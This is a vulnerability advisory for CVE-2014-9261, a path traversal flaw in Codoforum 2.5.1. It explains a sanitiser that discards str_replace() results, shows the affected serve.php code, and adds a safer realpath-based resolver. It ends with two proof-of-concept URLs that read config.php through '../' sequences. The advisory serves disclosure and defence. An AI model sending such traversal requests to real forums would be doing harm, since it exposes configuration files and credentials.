Codoforum 2.5.1 Arbitrary File Download

Homepage:

https://codoforum.com/

CVE-ID

CVE-2014-9261

CVSS Score

5

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description:

str_replace() is used to sanitize the file path, but the function's return value is never assigned back to the variable. So instead of:

private function sanitize($name) {

    $name = str_replace("..", "", $name);
    $name = str_replace("%2e%2e", "", $name);

    return $name;
}

the shipped code has:

private function sanitize($name) {

    // str_replace() returns the modified string; the result is discarded,
    // so $name is returned exactly as it was received.
    str_replace("..", "", $name);
    str_replace("%2e%2e", "", $name);

    return $name;
}

So $_GET['path'] is passed through unsanitized and reaches the file-serving code unchanged.

File: codoforum\sys\Controller\serve.php

public function attachment() {

    $name = $this->sanitize($_GET['path']);
    $dir = DATA_PATH . 'assets/img/attachments/';

    $this->set_headers($name, $dir);
}

public function smiley() {

    $name = $this->sanitize($_GET['path']);
    $dir = DATA_PATH . 'assets/img/smileys/';

    $this->set_headers($name, $dir);
}
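The following is an added example, not Codoforum's code. It shows the discarded-return bug beside a resolver that does not rely on stripping traversal sequences at all: it keeps only the final path component, resolves the result with realpath(), and refuses anything that does not land on a regular file inside the intended directory. The function names and the use of sys_get_temp_dir() as a stand-in for DATA_PATH . 'assets/img/attachments/' are assumptions.

```php
<?php
// Added example, not Codoforum's code. Assumed names: sanitize_as_shipped,
// resolve_attachment; sys_get_temp_dir() stands in for the attachments directory.

// As shipped in 2.5.1: str_replace() returns a new string and the result is
// thrown away, so the caller receives $name unchanged.
function sanitize_as_shipped(string $name): string {
    str_replace("..", "", $name);
    str_replace("%2e%2e", "", $name);
    return $name;
}

// Resolve the requested name against the intended directory and refuse anything
// that does not resolve to a regular file inside it. This does not depend on
// recognising any particular spelling of a traversal sequence.
function resolve_attachment(string $dir, string $name): ?string {
    $base = realpath($dir);
    if ($base === false) {
        return null;                       // directory missing: fail closed
    }
    // Attachments are stored flat, so only the final component is meaningful.
    $name = basename(str_replace('\\', '/', $name));
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($full === false || !is_file($full)) {
        return null;                       // nonexistent, or not a regular file
    }
    // Containment check: the resolved path must sit below $base. This also
    // catches a symlink inside the directory that points elsewhere.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// Demonstration on the advisory's own input.
$traversal = '../../../../../sites/default/config.php';
var_dump(sanitize_as_shipped($traversal) === $traversal);   // bool(true): nothing stripped
var_dump(resolve_attachment(sys_get_temp_dir(), $traversal)); // NULL: request refused
```

Note that PHP has already URL-decoded $_GET['path'] before the controller sees it, so a check that runs on the decoded value and resolves the real path is what matters, not matching encoded forms such as %2e%2e.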

Proof of Concept:

http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php
or
http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php

Timeline: